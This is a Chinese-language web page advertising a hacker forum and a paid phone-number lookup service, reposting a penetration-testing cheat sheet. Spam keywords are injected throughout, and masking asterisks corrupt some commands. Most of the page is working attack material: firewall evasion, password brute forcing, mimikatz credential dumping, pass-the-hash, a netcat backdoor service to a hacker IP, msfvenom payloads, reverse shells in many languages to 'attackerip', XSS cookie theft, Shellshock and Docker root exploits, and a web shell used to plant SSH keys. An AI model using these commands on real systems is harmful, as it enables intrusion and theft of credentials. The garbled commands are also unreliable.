黑客论坛qq群-黑客代查手机号-渗透测试工具实战技巧合集

hacker4年前黑客文章318

*** 黑客代查手机号-渗入检测工具实战技巧合辑

文中为作者汇总自身在网站渗透测试中常见的一些小窍门。原文分成两一部分,译员将其合二为一,便捷大伙儿查看。

更好是的 NMAP 扫描策略

# 可用全部尺寸互联网更好是的 nmap 扫描策略

# 服务器发觉,形成生存服务器列表

$ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24

$ grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > LiveHosts.txt

# 端口号发觉,发觉绝大多数常用端口

# 黑客论坛qq群 http://nmap.org/presentations/BHDC08/bhdc08-slides-fyodor.pdf

$ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt

$ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt

$ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt

# 端口号发觉,发觉所有端口号,但 UDP 端口号的扫描会十分慢

$ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt

$ nmap -sU -T4 -Pn -p 0-655黑客论坛qq群35 -oN FullUDP -iL LiveHosts.txt

# 显示信息 TCP\\UDP 端口号

$ grep "open" FullTCP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print "T:"$0}'

$ grep "open" FullUDP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print "U:"$0}'

# 探测服务项目版本号

$ 黑客论坛qq群 nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt

# 扫重装系统扫描

$ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt

# 系统软件和服务项目检验

$ nmap -O -sV -T4 -Pn -p U:53,111,137,T:21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts.txt

Nmap – 避开服务器防火墙

# 按段

$ nmap -f

# 改动默认设置 MTU 尺寸,但务必为 8 的倍率(8,16,24,32 这些)

$黑客论坛qq群 nmap --mtu 24

# 生成随机数量的蒙骗

$ nmap -D RND:10[target]

# 手动式特定蒙骗应用的 IP

$ nmap -D decoy1,decoy2,decoy3 etc.

# 拒绝服务攻击扫描, 更先必须寻找拒绝服务攻击的IP

$ nmap -sI[Zombie IP][Target IP]

# 特定源服务器端口

$ nmap --source-port 80 IP

# 在每一个扫描数据文件后增加任意总数的数据信息

$ nmap --data-length 25 IP

# MAC 详细地址蒙骗,能够形成不一样服务器的 MAC 黑客论坛qq群 详细地址

$ nmap --spoof-mac Dell/Apple/3Com IP

Nmap 开展 Web 系统漏洞扫描

cd /usr/share/nmap/scripts/

wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz

nmap -sS -sV --script=vulscan/vulscan.nse target

nmap -sS -sV --script=vulscan/vulscan.nse –script-args 黑客论坛qq群 vulscandb=scipvuldb.csv target

nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target

nmap -PN -sS -sV --script=vulscan –script-args vulscancorrelation=1 -p80 target

nmap -sV --script=vuln target

nmap -PN -sS -sV --script=all –script-args vulscancorrelation=1 target

黑客论坛qq群应用 DIRB 工程爆破文件目录

注:DIRB 是一个专业用以工程爆破文件目录的专用工具,在 Kali 中默认设置早已安裝,相近专用工具也有海外的patator,dirsearch,DirBuster, 中国的幻剑这些。

dirb http://IP:PORT /usr/share/dirb/wordlists/common.txt

Patator – 全能型暴力破解密码检测工具

# git clone https://github.com/lanjelot/patator.git /usr/share/patator

# *** TP 工程爆破

$ patator *** tp_login host=192.168.17.129 user=Ololena 黑客论坛qq群 password=FILE0 0=/usr/share/john/password.lst

$ patator *** tp_login host=192.168.17.129 user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst

$ patator *** tp_login host=192.168.17.129 helo='ehlo 192.168.17.128' user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst

$ patator 黑客论坛qq群 *** tp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst -x ignore:fgrep='incorrect password or account name'

应用 Fierce 工程爆破 DNS

注:Fierce 会查验 DNS *** 服务器是不是容许地区传输。假如容许,便会开展地区传输并通告客户,假如不允许,则能够根据查看 DNS *** 服务器枚举类型IP地址。相近专用工具:subDomainsBrute 和 SubBrute 这些

# http://ha.ckers.org/fierce/

$ ./fierce.pl -dns example.黑客论坛qq群com

$ ./fierce.pl –dns example.com –wordlist myWordList.txt

应用 Nikto 扫描 Web 服务项目

nikto -C all -h http://IP

扫描 WordPress

git clone https://github.com/wpscanteam/wpscan.git && cd wpscan

./wpscan –url http://IP/ –enumerate p

HTTP 指纹验证

wget http://www.net-square.com/_assets/黑客论坛qq群httprint_linux_301.zip && unzip httprint_linux_301.zip

cd httprint_301/linux/

./httprint -h http://IP -s signatures.txt

应用 Skipfish 扫描

注:Skipfish 是一款 Web 运用安全性侦察专用工具,Skipfish 会运用递归 *** 爬虫和根据词典的探头形成一幅互动式sitmap,最后形成的地形图会在根据安全大检查后輸出。

skipfish -m 5 - *** -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http://IP

黑客论坛qq群

应用 NC 扫描

nc -v -w 1 target -z 1-1000

for i in{101..102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done

Unicornscan

注:Unicornscan 是一个信息收集和 *** 安全审计的专用工具。

us -H -msf -Iv 192.168.56.101 -p 1-65535

us -H -mU -Iv 192.168.56.101 -p 1-65535

-H 在形成汇报环节分析IP地址

-m 扫描种类 (sf - tcp, U - udp)

-Iv - 详尽

黑客论坛qq群应用 Xprobe2 鉴别电脑操作系统指纹识别

xprobe2 -v -p tcp:80:open IP

枚举类型 Samba

nmblookup -A target

*** bclient //MOUNT/share -I target -N

rpcclient -U "" target

en um4linux target

枚举 SNMP

snmpget -v 1 -c public IP

snmpwalk -v 1 -c public IP

snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP

实用的 Windows 黑客论坛qq群 cmd 命令

net localgroup Users

net localgroup Administrators

search dir/s *.doc

system("start cmd.exe /k $cmd")

sc create microsoft_update binpath="cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe" start= auto error= ignore

/c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779

黑客论坛qq群

mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"

Procdump.exe -accepteula -ma lsass.exe lsass.dmp

mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"

C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp 32 位系统

C:\temp\procdump.exe 黑客论坛qq群 -accepteula -64 -ma lsass.exe lsass.dmp 64 位系统

PuTTY 连接隧道

转发远程端口到目标地址

plink.exe -P 22 -l root -pw "1234" -R 445:127.0.0.1:445 IP

Meterpreter 端口转发

# https://www.offensive-security.com/metasploit-unleashed/portfwd/

# 转发远程端口到目标地址

meterpreter > portfwd add –l 3389 –p 3389 –r 黑客论坛qq群 172.16.194.141

kali > rdesktop 127.0.0.1:3389

开启 RDP 服务

reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0

netsh firewall set service remoteadmin enable

netsh firewall set service remotedesktop enable

关闭 Windows 防火墙

netsh firewall set opmode 黑客论坛qq群 disable

Meterpreter VNC\RDP

# https://www.offensive-security.com/metasploit-unleashed/enabling-remote-desktop/

run getgui -u admin -p 1234

run vnc -p 5043

使用 Mimikatz

获取 Windows 明文用户名密码

git clone https://github.com/gentilkiwi/mimikatz.git

privilege::debug

sekurlsa::logonPasswords full

获取哈希值

git clone https://github.com/byt3bl33d3r/pth-toolkit

pth-winexe -U hash //IP cmd

或者

apt-get install freerdp-x11

xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP

在或者

meterpreter > run post/windows/gather/hashdump

Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b75黑客论坛qq群86c:::

msf > use exploit/windows/ *** b/psexec

msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp

msf exploit(psexec) > set *** BPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c

msf exploit(psexec) > exploit

meterpreter > shell

使用 Hashcat 破解密码

hashcat -m 400 -a 0黑客论坛qq群 hash /root/rockyou.txt

使用 NC 抓取 Banner 信息

nc 192.168.0.10 80

GET / HTTP/1.1

Host: 192.168.0.10

User-Agent: Mozilla/4.0

Referrer: www.example.com

<enter>

<enter>

使用 NC 在 Windows 上反弹 shell

c:>nc -Lp 31337 -vv -e cmd.exe

nc 192.168.0.10 31337

c:>nc example.com 黑客论坛qq群 80 -e cmd.exe

nc -lp 80

nc -lp 31337 -e /bin/bash

nc 192.168.0.10 31337

nc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i/o error) 1-1000

查找 SUID\SGID root 文件

# 查找 SUID root 文件

find / -user root -perm -4000 -print

# 查找 SGID root 文件:

find / -group root -perm -2000 -print

# 查找 SUID 和 SGID 黑客论坛qq群 文件:

find / -perm -4000 -o -perm -2000 -print

# 查找不属于任何用户的文件:

find / -nouser -print

# 查找不属于任何用户组的文件:

find / -nogroup -print

# 查找软连接及其指向:

find / -type l -ls

Python shell

python -c 'import pty;pty.spawn("/bin/bash")'

Python\Ruby\PHP HTTP 服务器

python2 -m SimpleHTTPServer

python3 黑客论坛qq群 -m http.server

ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888,

ocumentRoot => Dir.pwd).start"

php -S 0.0.0.0:8888

获取进程对应的 黑客论坛qq群 PID

fuser -nv tcp 80

fuser -k -n tcp 80

使用 Hydra 爆破 RDP

hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp

挂载远程 Windows 共享文件夹

*** bmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw

Kali 下编译 Exploit

gcc -m32 -o output32 hello.c (32 位)

gcc -m64 -o output hello.c (64 黑客论坛qq群 位)

Kali 下编译 Windows Exploit

wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download

wine mingw-get-setup.exe

select mingw32-base

cd /root/.wine/drive_c/windows

wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip

cd 黑客论坛qq群 /root/.wine/drive_c/MinGW/bin

wine gcc -o ability.exe /tmp/exploit.c -lwsock32

wine ability.exe

NA *** 命令

注:NA *** 全称 The Netwide Assembler,是一款基于80×86和x86-64平台的汇编语言编译程序,其设计初衷是为了实现编译器程序跨平台和模块化的特性。

na *** -f bin -o payload.bin payload.a ***

na *** -f elf payload.a *** ; ld -o payload payload.o; objdump -d payload

SSH 穿透

ssh -D 黑客论坛qq群 127.0.0.1:1080 -p 22 user@IP

Add socks4 127.0.0.1 1080 in /etc/proxychains.conf

proxychains commands target

SSH 穿透从一个 *** 到另一个 ***

ssh -D 127.0.0.1:1080 -p 22 user1@IP1

Add socks4 127.0.0.1 1080 in /etc/proxychains.conf

proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2

Add socks4 127.0.0.1 1081 in 黑客论坛qq群 /etc/proxychains.conf

proxychains commands target

使用 metasploit 进行穿透

route add X.X.X.X 255.255.255.0 1

use auxiliary/server/socks4a

run

proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E

或者

# https://www.offensive-security.com/metasploit-unleashed/pivoting/

meterpreter 黑客论坛qq群 > ipconfig

IP Address : 10.1.13.3

meterpreter > run autoroute -s 10.1.13.0/24

meterpreter > run autoroute -p

10.1.13.0 255.255.255.0 Session 1

meterpreter > Ctrl+Z

msf auxiliary(tcp) > use exploit/windows/ *** b/psexec

msf exploit(psexec) > set RHOST 10.1.13.2

msf 黑客论坛qq群 exploit(psexec) > exploit

meterpreter > ipconfig

IP Address : 10.1.13.2

基于 CSV 文件查询 Exploit-DB

git clone https://github.com/offensive-security/exploit-database.git

cd exploit-database

./searchsploit –u

./searchsploit apache 2.2

./searchsploit "Linux Kernel"

cat files.csv 黑客论坛qq群 | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep "<|<=" | sort -k3

MSF Payloads

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> X > system.exe

msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 R > exploit.php

msfvenom -p 黑客论坛qq群 windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -a x86 --platform win -f asp -o file.asp

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f c

MSF 生成在 Linux 下反弹的 Meterpreter Shell

msfvenom -p linux/x86/meterpreter/reverse_tcp 黑客论坛qq群 LHOST=<IP Address> LPORT=443 -e -f elf -a x86 --platform linux -o shell

MSF 生成反弹 Shell (C Shellcode)

msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b "\x00\x0a\x0d" -a x86 --platform win -f c

MSF 生成反弹 Python Shell

msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py

MSF 生成反弹 ASP Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp -a x86 --platform win -o shell.asp

MSF 生成反弹 Bash Shell

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.sh

MSF 生成反弹 PHP 黑客论坛qq群 Shell

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.php

add <?php at the beginning

perl -i~ -0777pe's/^/<?php \n/' shell.php

MSF 生成反弹 Win Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On>黑客论坛qq群 -f exe -a x86 --platform win -o shell.exe

Linux 常用安全命令

# 使用 uid 查找对应的程序

find / -uid 0 -perm -4000

# 查找哪里拥有写权限

find / -perm -o=w

# 查找名称中包含点和空格的文件

find / -name " " -print

find / -name ".." -print

find / -name ". " -print

find / -name " " -print

黑客论坛qq群

# 查找不属于任何人的文件

find / -nouser

# 查找未链接的文件

lsof +L1

# 获取进程打开端口的信息

lsof -i

# 看看 ARP 表中是否有奇怪的东西

arp -a

# 查看所有账户

getent passwd

# 查看所有用户组

getent group

# 列举所有用户的 crontabs

for user in $(getent passwd|cut -f1 -d:); do echo "### Crontabs for $user ####"; crontab 黑客论坛qq群 -u $user -l; done

# 生成随机密码

cat /dev/urandom| tr -dc ‘a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?=’|fold -w 12| head -n 4

# 查找所有不可修改的文件

find . | xargs -I file lsattr -a file 2>/dev/null | grep ‘^….i’

# 使文件不可修改

chattr -i file

Windows 缓冲区溢出利用命令

msfvenom -p 黑客论坛qq群 windows/shell_bind_tcp -a x86 --platform win -b "\x00" -f c

msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 -a x86 --platform win -e x86/shikata_ga_nai -b "\x00" -f c

COMMON *** USED BAD CHARACTERS:

\x00\x0a\x0d\x20 For http request

\x00\x0a\x0d\x20\x1a\x2c\x2e\3a\x5c 黑客论坛qq群 Ending with (0\n\r_)

# 常用命令:

pattern create

pattern offset (EIP Address)

pattern offset (ESP Address)

add garbage upto EIP value and add (JMP ESP address) in EIP . (ESP = shellcode )

!pvefindaddr pattern_create 5000

!pvefindaddr suggest

!pvefindaddr modules

!pvefindaddr nosafeseh

!mona 黑客论坛qq群 config -set workingfolder C:\Mona\%p

!mona config -get workingfolder

!mona mod

!mona bytearray -b "\x00\x0a"

!mona pc 5000

!mona po EIP

!mona suggest

SEH – 结构化异常处理

注:SEH(“Structured Exception Handling”),即结构化异常处理,是 windows 操作系统提供给程序设计者的强有力的处理程序错误或异常的武器。

# 黑客论坛qq群 https://en. *** .org/wiki/Microsoft-specific_exception_handling_mechani *** s#SEH

# http://baike.baidu.com/view/243131.htm

!mona suggest

!mona nosafeseh

nseh="\xeb\x06\x90\x90" (next seh chain)

iseh= !pvefindaddr p1 -n -o -i (POP POP RETRUN or POPr32,POPr32,RETN)

ROP (DEP)

注:ROP(“Return-Oriented 黑客论坛qq群 Programming”)是计算机安全漏洞利用技术,该技术允许攻击者在安全防御的情况下执行代码,如不可执行的内存和代码签名。

DEP(“Data Execution Prevention”)是一套软硬件技术,在内存上严格将代码和数据进行区分,防止数据当做代码执行。

# https://en. *** .org/wiki/Return-oriented_programming

# https://zh. *** .org/wiki/%E8%BF%94%E5%9B%9E%E5%AF%BC%E5%90%91%E7%BC%96%E7%A8%8B

# https://en. *** .org/wiki/Data_Execution_Prevention

# 黑客论坛qq群 http://baike.baidu.com/item/DEP/7694630

!mona modules

!mona ropfunc -m *.dll -cpb "\x00\x09\x0a"

!mona rop -m *.dll -cpb "\x00\x09\x0a" (auto suggest)

ASLR – 地址空间格局随机化

# https://en. *** .org/wiki/Address_space_layout_randomization

# 黑客论坛qq群 http://baike.baidu.com/view/3862310.htm

!mona noaslr

寻蛋(EGG Hunter)技术

Egg hunting这种技术可以被归为“分级shellcode”,它主要可以支持你用一小段特制的shellcode来找到你的实际的(更大的)shellcode(我们的‘鸡蛋‘),原理就是通过在内存中搜索我们的最终shellcode。换句话说,一段短代码先执行,然后再去寻找真正的shellcode并执行。– 参考自看雪论坛,更多详情可以查阅我在代码注释中增加的链接。

# https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/

# 黑客论坛qq群 http://www.pediy.com/kssd/pediy12/116190/831793/45248.pdf

# http://www.fuzzysecurity.com/tutorials/expDev/4.html

!mona jmp -r esp

!mona egg -t lxxl

\xeb\xc4 (jump backward -60)

buff=lxxllxxl+shell

!mona egg -t 'w00t'

GDB Debugger 常用命令

# 设置断点

break *_start

# 执行下一个命令

next

step

n

s

# 继续执行

continue

c

# 数据

checking 'REGISTERS' and 'MEMORY'

# 显示寄存器的值: (Decimal,Binary,Hex)

print /d –> Decimal

print /t –> Binary

print /x –> Hex

O/P :

(gdb) print /d $eax

$17 = 13

(gdb) 黑客论坛qq群 print /t $eax

$18 = 1101

(gdb) print /x $eax

$19 = 0xd

(gdb)

# 显示特定内存地址的值

command : x/nyz (Examine)

n –> Number of fields to display ==>

y –> Format for output ==> c (character) , d (decimal) , x (Hexadecimal)

z –> Size of field to be displayed ==> b (byte) , 黑客论坛qq群 h (halfword), w (word 32 Bit)

BASH 反弹 Shell

bash -i >& /dev/tcp/X.X.X.X/443 0>&1

exec /bin/bash 0&0 2>&0

exec /bin/bash 0&0 2>&0

0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

0<&196;exec 196<>/dev/tcp/attackerip/黑客论坛qq群4444; sh <&196 >&196 2>&196

exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done

exec 5<>/dev/tcp/attackerip/4444

cat <&5 | while read line; do $line 2>&5 >&5黑客论坛qq群; done # or:

while read line 0<&5; do $line 2>&5 >&5; done

/bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1

/bin/bash -i > /dev/tcp/X.X.X.X/443 0<&1 2>&1

PERL 反弹 Shell

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ 黑客论坛qq群 while<>;'

# Win 平台

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

perl -e 'use 黑客论坛qq群 Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’

RUBY 反弹 Shell

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print 黑客论坛qq群 io.read}end'

# Win 平台

ruby -rsocket -e 'c=TCPSocket.new("attackerip","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

ruby -rsocket -e 'f=TCPSocket.open("attackerip","443").to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

PYTHON 黑客论坛qq群 反弹 Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP 反弹 Shell

php -r '$sock=fsockopen("attackerip",443);exec(黑客论坛qq群"/bin/sh -i <&3 >&3 2>&3");'

JAVA 反弹 Shell

r = Runtime.getRuntime()

p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/attackerip/443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])

p.waitFor()

NETCAT 反弹 Shell

nc 黑客论坛qq群 -e /bin/sh attackerip 4444

nc -e /bin/sh 192.168.37.10 443

# 如果 -e 参数被禁用,可以尝试以下命令

# mknod backpipe p && nc attackerip 443 0<backpipe | /bin/bash 1>backpipe

/bin/sh | nc attackerip 443

rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4443 0/tmp/

# 如果你安装错了 netcat 的版本,请尝试以下命令

rm /tmp/f;mkfifo 黑客论坛qq群 /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip >/tmp/f

TELNET 反弹 Shell

# 如果 netcat 不可用或者 /dev/tcp

mknod backpipe p && telnet attackerip 443 0<backpipe | /bin/bash 1>backpipe

XTERM 反弹 Shell

# http://baike.baidu.com/view/418628.htm

# 开启 X 服务器 (:1 – 监听 TCP 端口 6001)

apt-get install 黑客论坛qq群 xnest

Xnest :1

# 记得授权来自目标 IP 的连接

xterm -display 127.0.0.1:1

# 授权访问

xhost +targetip

# 在目标机器上连接回我们的 X 服务器

xterm -display attackerip:1

/usr/openwin/bin/xterm -display attackerip:1

or

$ DISPLAY=attackerip:0 xterm

XSS 备忘录

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

("< 黑客论坛qq群 iframes > src=http://IP:PORT </ iframes >")

<script>document.location=http://IP:PORT</script>

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//–></SCRIPT&黑客论坛qq群gt;">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

";!–"<XSS>=&amp;amp;{()}

<IMG SRC="javascript:alert('XSS');">

<IMG SRC=javascript:alert('XSS')>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>"">

黑客论坛qq群

<IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41;>

<IMG 黑客论坛qq群 SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;#0000097&amp;amp;#0000108&黑客论坛qq群amp;amp;#0000101&amp;amp;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;#0000083&amp;amp;#0000039&amp;amp;#0000041>

<IMG SRC="jav ascript:alert('XSS');">

perl -e 'print "<IMG SRC=javascript:alert(\"XSS\")>";' 黑客论坛qq群 > out

<BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(">< iframes http://google.com < iframes >)

<BODY BACKGROUND="javascript:alert('XSS')">

<FRAMESET><FRAME SRC=”javascript:alert('XSS');"></FRAMESET>

"><script 黑客论坛qq群 >alert(document.cookie)</script>

%253cscript%253ealert(document.cookie)%253c/script%253e

"><s"%2b"cript>alert(document.cookie)</script>

%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)'%3E

<img src=asdf onerror=alert(document.黑客论坛qq群cookie)>

SSH Over SCTP (使用 Socat)

# 远端服务器

# 假设你准备让 SCTP socket 监听端口 80/SCTP 并且 sshd 端口在 22/TCP

$ socat SCTP-LISTEN:80,fork TCP:localhost:22

# 本地端

# 将 SERVER_IP 换成远端服务器的地址,然后将 80 换成 SCTP 监听的端口号

$ socat TCP-LISTEN:1337,fork SCTP:SERVER_IP:80

# 创建 socks ***

# 替换 username 和 -p 的端口号

$ ssh 黑客论坛qq群 -lusername localhost -D 8080 -p 1337

使用洋葱 ***

# 安装服务

$ apt-get install tor torsocks

# 绑定 ssh 到 tor 服务端口 80

# /etc/tor/torrc

SocksPolicy accept 127.0.0.1

SocksPolicy accept 192.168.0.0/16

Log notice file /var/log/tor/notices.log

RunAsDaemon 1

HiddenServiceDir /var/lib/tor/ssh_hidden_service/

HiddenServicePort 黑客论坛qq群 80 127.0.0.1:22

PublishServerDescriptor 0

$ /etc/init.d/tor start

$ cat /var/lib/tor/ssh_hidden_service/hostname

3l5zstvt1zk5jhl662.onion

# ssh 客户端连接

$ apt-get install torsocks

$ torsocks ssh login@3l5zstvt1zk5jhl662.onion -p 80

Metagoofil – 元数据收集工具

注:Metagoofil 黑客论坛qq群 是一款利用Google收集信息的工具。

# http://www.edge-security.com/metagoofil.php

# 它可以自动在搜素引擎中检索和分析文件,还具有提供Mac地址,用户名列表等其他功能

$ python metagoofil.py -d example.com -t doc,pdf -l 200 -n 50 -o examplefiles -f results.html

利用 Shellshock

# 一个发现并利用服务器 Shellshock 的工具

# https://github.com/nccgroup/shocker

$ ./shocker.py -H 192.168.黑客论坛qq群56.118 --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose

# 查看文件

$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.56.118 80

# 绑定 shell

$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: 黑客论坛qq群 () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.56.118 80

# 反弹 Shell

$ nc -l -p 443

$ echo "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.56.103 443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.56.118 80黑客论坛qq群

获取 Docker 的 Root

# 获取 Docker 的 Root

# user 必须在 docker 用户组中

ek@victum:~/docker-test$ id

uid=1001(ek) gid=1001(ek) groups=1001(ek),114(docker)

ek@victum:~$ mkdir docker-test

ek@victum:~$ cd docker-test

ek@victum:~$ cat > Dockerfile

FROM debian:wheezy

ENV WORKDIR /stuff

RUN 黑客论坛qq群 mkdir -p $WORKDIR

VOLUME [ $WORKDIR ]

WORKDIR $WORKDIR

<< EOF

ek@victum:~$ docker build -t my-docker-image .

ek@victum:~$ docker run -v $PWD:/stuff -t my-docker-image /bin/sh -c \

'cp /bin/sh /stuff && chown root.root /stuff/sh && chmod a+s /stuff/sh'

./sh

whoami

# 黑客论坛qq群 root

ek@victum:~$ docker run -v /etc:/stuff -t my-docker-image /bin/sh -c 'cat /stuff/shadow'

使用 DNS 隧道绕过防火墙

# 让数据和命令使用 DNS 隧道传输以绕过防火墙的检查

# dnscat2 支持从目标主机上面上传和下载命令来获取文件、数据和程序

# 服务器 (攻击者)

$ apt-get update

$ apt-get -y install ruby-dev git make g++

$ gem install bundler

$ git clone https://github.com/黑客论坛qq群iagox86/dnscat2.git

$ cd dnscat2/server

$ bundle install

$ ruby ./dnscat2.rb

dnscat2> New session established: 16059

dnscat2> session -i 16059

# 客户机 (目标)

# https://downloads.skullsecurity.org/dnscat2/

# https://github.com/lukebaggett/dnscat2-powershell

$ dnscat --host <dnscat server_ip&黑客论坛qq群gt;

编译 Assemble 代码

$ na *** -f elf32 simple32.a *** -o simple32.o

$ ld -m elf_i386 simple32.o simple32

$ na *** -f elf64 simple.a *** -o simple.o

$ ld simple.o -o simple

使用非交互 Shell 打入内网

# 生成 shell 使用的 ssh 密钥

$ wget -O - -q "http://domain.tk/sh.php?cmd=whoami"

$ wget -O - -q 黑客论坛qq群 "http://domain.tk/sh.php?cmd=ssh-keygen -f /tmp/id_rsa -N \"\" "

$ wget -O - -q "http://domain.tk/sh.php?cmd=cat /tmp/id_rsa"

# 增加用户 tempuser

$ useradd -m tempuser

$ mkdir /home/tempuser/.ssh && chmod 700 /home/tempuser/.ssh

$ wget -O - -q "http://domain.tk/sh.php?cmd=cat /tmp/id_rsa" > 黑客论坛qq群 /home/tempuser/.ssh/authorized_keys

$ chmod 700 /home/tempuser/.ssh/authorized_keys

